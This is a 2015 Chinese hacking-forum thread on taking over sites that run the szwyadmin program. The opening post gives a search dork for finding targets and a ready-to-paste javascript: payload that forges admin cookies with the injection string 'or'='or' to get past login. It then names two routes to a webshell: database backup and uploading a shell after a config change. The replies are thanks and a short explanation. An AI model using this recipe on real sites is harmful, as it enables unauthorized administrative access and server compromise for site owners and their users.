szwyadmin程序cookies欺骗漏洞拿shell

兜兜裹套套。 · 发表于 2015-6-25 16:40:13

关键字:inurl:szwyadmin/login.asp
任意打开一个搜索结果，打开登录界面后在地址栏中输入下面的代码：
javascript:alert(document.cookie="adminuser="+escape("'or'='or'")); alert(document.cookie="adminpass="+escape("'or'='or'")); alert(document.cookie="admindj="+escape("1"));location.href="admin_index.asp";

后台拿 shell 的方法：
1、数据库备份拿shell
2、直接改配置之后，上传shell文件（成功极少）

wuyan · 发表于 2015-6-25 19:59:38

这个说白了，就是登陆注入，只是把post方式转换成cookie注入

小路 · 发表于 2015-6-27 06:09:27

还是不错的哦，顶了

人=族 · 发表于 2015-6-27 22:22:05

不错

admin1964 · 发表于 2015-6-27 23:36:16

感谢楼主的分享~

云游者 · 发表于 2015-6-28 01:05:28

Micah · 发表于 2015-6-28 01:50:03

云游者 · 发表于 2015-6-28 02:39:38

还是不错的哦，顶了

fkqqxx · 发表于 2015-6-28 04:08:37

wuyan 发表于 2015-6-25 19:59
这个说白了，就是登陆注入，只是把post方式转换成cookie注入

做个详细解释把，么么哒

arctic · 发表于 2015-6-28 16:37:00

感谢楼主的分享~

szwyadmin程序cookies欺骗漏洞拿shell

相关帖子

点评

指导单位

旗下站点

联系我们